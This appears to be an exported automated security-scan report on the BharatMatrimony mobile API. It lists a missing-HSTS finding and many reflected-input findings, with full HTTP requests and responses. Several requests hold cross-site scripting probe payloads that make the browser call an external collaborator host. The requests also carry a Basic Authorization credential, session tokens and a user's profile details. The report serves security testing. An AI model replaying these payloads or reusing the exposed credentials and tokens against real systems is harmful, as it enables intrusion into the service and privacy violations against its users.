SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902771&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=02ff975d1149526a01c1cfcf7f39321a8&TOKEN
ID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&SDBMATRID=M6651646&STLIMIT=0&RECCNT=20&GE
NDER=M&INAPPIDS=M6257665,E5321603&CONTACTED=0&VIEWED=0&LOGINGEN=M&FROMINAPP=1&USERTIMEDET=1589902771
&SHORTLISTED=0&LOGINTYPE=F&STLIMIT=0&RECCNT=20 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 3301
Content-Type: application/json
Date: Tue, 19 May 2020 15:39:33 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALRESULTS":"2","MATCHINGCOUNT":"2","REMAININGDAYS":"100","SEARCHRES":
{"PROFILE":[{"PROFILESTATUS":"0","MATRIID":"M6257665","NAME":"Vasutha","AGE":"24","GENDER":
...[SNIP]...
Summary
Severity: Low
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /
Issue description
The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a
legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a
platform for attacks against its users. This attack is performed by rewriting HTTPS links as HTTP, so that if a targeted user
follows a link to the site from an HTTP page, their browser never attempts to use an encrypted connection. The sslstrip tool
automates this process.
To exploit this vulnerability, an attacker must be suitably positioned to intercept and modify the victim's network traffic.
This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi,
or a corporate or home network that is shared with a compromised computer. Common defences such as switched
networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure
could also perform this attack. Note that an advanced adversary could potentially target any connection made over the
Internet's core infrastructure.
Issue remediation
The application should instruct web browsers to only access the application using HTTPS. To do this, enable HTTP Strict
Transport Security (HSTS) by adding a response header with the name 'Strict-Transport-Security' and the value 'max-
age=expireTime', where expireTime is the time in seconds that browsers should remember that the site should only be
accessed using HTTPS. Consider adding the 'includeSubDomains' flag if appropriate.
Note that because HSTS is a "trust on first use" (TOFU) protocol, a user who has never accessed the application will never
have seen the HSTS header, and will therefore still be vulnerable to SSL stripping attacks. To mitigate this risk, you can
optionally add the 'preload' flag to the HSTS header, and submit the domain for review by browser vendors.
References
· HTTP Strict Transport Security
· sslstrip
· HSTS Preload Form
Vulnerability classifications
· CWE-523: Unprotected Transport of Credentials
5. Input returned in response (reflected)
Previous Next
Issue background
Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many
client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection.
Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is
returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing
(for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.
Vulnerability classifications
· CWE-20: Improper Input Validation
· CWE-116: Improper Encoding or Escaping of Output
5.1. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.
php [URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /apicommhistory/communicationhistory.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /apicommhistory/communicationhistory.php0pspdc49sf HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 179
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ID=M6651646&OUTPUTTY
PE=2&RECEIVERID=B2678847&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:49 GMT
Connection: close
5.2. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.
php [name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /apicommhistory/communicationhistory.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /apicommhistory/communicationhistory.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f1acewlgt459ws4ty5ut6iq4w0n6du5kteg64v%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 179
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ID=M6651646&OUTPUTTY
PE=2&RECEIVERID=B2678847&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 349
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:16:07 GMT
Connection: close
5.3. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.ph
p [URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appassuredcontact/getphoneprivacy.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appassuredcontact/getphoneprivacy.phpn9mt2m82k4?SDBMATRID=M6651646 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 254
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ENTRYTYPE=M&ID
=M6651646&IGNOREFLAG=1&LOGINGEN=M&Lang=en&OUTPUTTYPE=2&PRIVACYPAGE=PHOTO&SDBMATRID=M6651646&ST
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 245
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:26:46 GMT
Connection: close
5.4. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.ph
p [name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appassuredcontact/getphoneprivacy.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appassuredcontact/getphoneprivacy.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fk6rxs4cc0o5fonph1dppe90fw62xqpgda02or%5c56burpcollaborator.net'%3e?SDBMATRID=M6651646 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 254
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ENTRYTYPE=M&ID
=M6651646&IGNOREFLAG=1&LOGINGEN=M&Lang=en&OUTPUTTYPE=2&PRIVACYPAGE=PHOTO&SDBMATRID=M6651646&ST
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 347
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:43:30 GMT
Connection: close
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdaily6/yettobeviewed.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appdaily6/yettobeviewed.phpwe5v73hy5d HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 174
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DAILY6=1&ENCID=02ff975d1149526a01c1cfcf7f39321a8&MEMBERID=M6
651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 235
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:53 GMT
Connection: close
5.6. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdaily6/yettobeviewed.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appdaily6/yettobeviewed.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2flncy95tdhpmg5o6iie6qvahgd7jz7rxfr2jq8%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 174
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DAILY6=1&ENCID=02ff975d1149526a01c1cfcf7f39321a8&MEMBERID=M6
651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 337
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:15:51 GMT
Connection: close
5.7. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.
php [URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appdynamicpopulate.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appdynamicarray/appdynamicpopulate.phpgyh11l7k61 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 93
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&REQTYPE=1-2-3-4-5-6-7-8-9-10-11-75
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:07:46 GMT
Connection: close
5.8. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.
php [name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appdynamicpopulate.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appdynamicarray/appdynamicpopulate.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f547iqpaxy930m8n2zynacuy0ur0koce08n0bp%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 93
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&REQTYPE=1-2-3-4-5-6-7-8-9-10-11-75
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 348
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:50 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL
/appdynamicarray/appdynamicpopulate.php/'"><svg/onload=(new(Image)).src='//547iqpaxy930m8n2zynacuy0ur0koce08
n0bp\56burpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.9. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.p
hp [URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appdynamicarray/28jsk7l01k HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 58
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:00:51 GMT
Connection: close
5.10. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.
php [name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appdynamicarray/appgetarrayversion.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b
%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2f7aikwrgz4b92sat450tciw420t6ougl4fr7fw
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 58
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 427
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:11:59 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appdynamicarray/appgetarrayversion.php/javascript:/*</script><svg/onload='+/"/
+/onmouseover=1/+/[*/[]/+((new(Image)).src=([]+/\/7aikwrgz4b92sat450tciw420t6ougl4fr7fw\.burpcollaborator.net/).replace(/\\/g,
[]))//'> was not found on this server.</p>
...[SNIP]...
5.11. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [URL
path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appeditprofile.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appeditprofile/appeditprofile.phpz3hefiy4bv HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 175
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&EDITFORM=5&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&MATRIID=
M6651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:11:20 GMT
Connection: close
5.12. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php
[name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appeditprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /appeditprofile/appeditprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f2vyfhm1up6uxd5ezqve73rpxlorkfc50znrbg%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 175
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&EDITFORM=5&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&MATRIID=
M6651646&OUTPUTTYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 343
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:14:40 GMT
Connection: close
5.13. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php
[URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appownprofile.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /appeditprofile/appownprofile.phpz0hjwo4iu8 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 249
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DEVICEDET=&DOS=28&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID
=M6651646&Lang=en&OUTPUTTYPE=2&SDBMATRID=M6651646~192&TOKENID=131c6f8396a2071562a9b7c10e0bdf14
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:20:45 GMT
Connection: close
5.14. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php
[name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appeditprofile/appownprofile.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response .
Request
POST /appeditprofile/appownprofile.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fybdbxihq52att1uv6ru3jn5t1k7hv9lxfk78w%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 249
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&DEVICEDET=&DOS=28&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID
=M6651646&Lang=en&OUTPUTTYPE=2&SDBMATRID=M6651646~192&TOKENID=131c6f8396a2071562a9b7c10e0bdf14
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 342
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:25:00 GMT
Connection: close
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
GET /appei/appspromos.phpydbgaayrwb?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:13:26 GMT
Connection: close
5.16. https://apps.bharatmatrimony.com/appei/appspromos.php [name of an
arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response .
Request
GET /appei/appspromos.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c%2f1qseclwtk5pw849ylu96yqkwgnmlad11vomcb
%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 409
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:17:22 GMT
Connection: close
5.17. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [URL
path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/appgetcountryip.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/appgetcountryip.phpq487ybrymd HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 72
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
Akamai-Age-Ms: 1589904157623
Date: Tue, 19 May 2020 16:02:37 GMT
Connection: close
5.18. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [name
of an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/appgetcountryip.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /applogin/appgetcountryip.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fowo1i82gqsvjerflrhft4dqjmas9g16p0cs0h%5c56burpcollaborator.net'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 72
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 338
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:03 GMT
Connection: close
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/getDeviceInfo.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /applogin/65d1vunofq?SDBMATRID=M6651646 HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 209
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=1e3edd6071d0eb091e7a25711511fe2a7&ENTRYTYPE=M&ID=M66
51646&LOGINGEN=M&OUTPUTTYPE=2&SDBMATRID=M6651646&START=0&TOKENID=131c6f8396a2071562a9b7c10e0bdf1
...[SNIP]...
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:22:21 GMT
Connection: close
5.20. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [name of
an arbitrarily supplied URL parameter]
Previous Next
Summary
Severity: Information
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/getDeviceInfo.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
GET /applogin/getDeviceInfo.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b%2fonmouseover
%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c
%2f0kld6kqse4jv233xft35spevamge72ztnnaey3%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Host: apps.bharatmatrimony.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1
